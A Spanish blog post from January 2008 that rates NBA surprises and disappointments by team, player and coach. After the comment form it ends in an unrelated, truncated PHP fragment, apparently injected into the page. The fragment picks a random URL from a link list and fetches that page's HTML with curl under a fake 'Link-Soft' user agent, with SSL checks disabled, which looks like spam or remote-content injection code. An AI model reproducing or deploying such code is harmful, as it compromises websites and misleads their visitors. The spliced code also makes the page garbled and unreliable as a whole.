Acordes y desacuerdos (11 de enero)

11 de January de 2008 por txusma

Nos acercamos inexorablemente al ecuador de la liga regular en la NBA y después de un mes se hacía necesario un nuevo análisis sobre las decepciones y sorpresas en la NBA. A año nuevo también formato nuevo, más simple y más rapido.

Acordes

Portland Trail Blazers: La franquicia de Oregón es plenamente merecedora de aparecer como una de las grandes sorpresas actualmente en la NBA. Después de una racha de 13 partidos consecutivos ganados liderados por un magnífico Brandon Roy, los Blazers comienzan a aparecer como candidatos a un puesto en los Playoffs aunque pocos confían verdaderamente que aguanten hasta el final. Lo que está por ver es cómo responderá este equipo el año que viene con todo un Greg Oden en pista.

Andrew Bynum: De transferible a imprescindible. En verano Kobe Bryant se enfadó porqué su franquicia no quiso (o no supo) desprenderse de Bynum para traerse, por ejemplo, a Jason Kidd y pidió abiertamente el traspaso. 5 meses más tarde todo está olvidado y Kobe Bryant y Andrew Bynum forman una de las parejas más sólidas del Oeste. El jugador de 20 años, escogido en el puesto 10 del draft del 2005, ha trabajado más que nunca en verano y ha elevado su rendimiento en todos los aspectos del juego aunque lo mejor puede estar aún por llegar.

Danny Ainge: Hasta el día de hoy la labor de Ainge al frente de los Celtics ha sido más que cuestionada pero de un plumazo a devuelto la ilusión a todos los seguidores de los verdes. Si había dudas del éxito del proyecto ahí estan los increíbles números de Garnett, Pierce, Allen y compañía, demostrando que están más motivados e implicados que nunca. Ya veremos si se alzarán con el campeonato pero, de momento, que les quiten lo bailao.

Jim Boylan: Hay momentos en los que es necesario un cambio en la dinámica de un equipo. Scott Skiles no encontraba la tecla que hiciese funcionar a los Bulls e incluso, en ocasiones, buscando la reacción de sus jugadores, tomó decisiones muy discutibles. Aún sin tiempo para que los suyos asimilen todos los conceptos, Boylan ya ha conseguido mejorar las prestaciones de Joe Smith y cambiar el rol de Ben Gordon, lo que ha mejorado el rendimiento de Chicago.

Chris Paul: El año pasado daba la impresión de que un compañero de promoción, Deron Williams, había conseguido arrebatar el galardón virtual de mejor base joven a CP3, pero este año no deja de demostrar lo contrario. Además de promediar 21.6 puntos y 10.2 asistencias por partido, con una eficiencia de 27, esta temporada está liderando a su equipo, los New Orleans Hornets, a una de sus mejores temporadas de los últimos años y ya aparecen en todas las quínielas para los próximos Playoffs.

Desacuerdos

Miami Heat: No es la primera vez que aparecen por aquí y seguramente no será la última. Los Heat son un equipo que debería pensar más en la reconstrucción que en hacer algo importante esta temporada aunque los rumores parece que van por otro camino. Cuando se gana todo es muy bonito pero en cuanto las cosas se han empezado a torcer han surgido los primeros roces entre Wade y Shaq, película que ya hemos visto con anterioridad. Mal pintan las cosas para la franquicia de Florida.

Mehmet Okur: Si hay un jugador que ha bajado sus prestaciones de forma espectacular de una temporada a otra ése es el turco de los Jazz, y su franquicia lo está notando. En Utah pueden aguantar jugar con un Kirilenko más out que otra cosa, pero con 2 jugadores lejos de su mejor forma… demasiado para Deron y Boozer. Se rumorean problemas de hombro, si es así esperemos que se resuelvan rápido y vuelva el mejor Okur.

Terry Porter: El ex-jugador y actual entrenador de los Milwaukee Bucks no está sabiendo sacar partido de la contrastada calidad de su plantilla. Parece inexplicable la poca confianza con la que cuentan jugadores como Charlie Bell o Charlie Villanueva, que han demostrado en más de una ocasión que pueden aportar muchas cosas a su equipo. Ahora, con Michael Redd lesionado, los Bucks encadenan 3 victorias consecutivas gracias, entre otras cosas, a estos 2 jugadores.

Marc Iavaroni: El nuevo entrenador de los Memphis Grizzlies no acaba de lograr que funcione su equipo. Emperrado en importar el estilo de los Suns, no se ha dado cuenta de que no dispone de los jugadores adecuados y lo más seguro es que Memphis busque un traspaso con su otrora jugador franquicia Pau Gasol que le permita dar definitivamente los galones a Rudy Gay y correr, correr, correr… Pero hasta ese momento, cada jugador hace la guerra por su cuenta y no se vislumbra un estilo claro.

Jermaine O’Neal: Jermaine declaró en verano por activa y por pasiva que quería dejar los Indiana Pacers, y sonaron incluso Los Angeles Lakers y los New York Knicks como posibles destinos. Tal vez enfadado por el hecho de no salirse con la suya nos encontramos ante una de las peores versiones de El Otro. Sus números han caído y ya no es el jugador resolutivo de antaño. ¿Han pasado los mejores días de Jermaine?

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>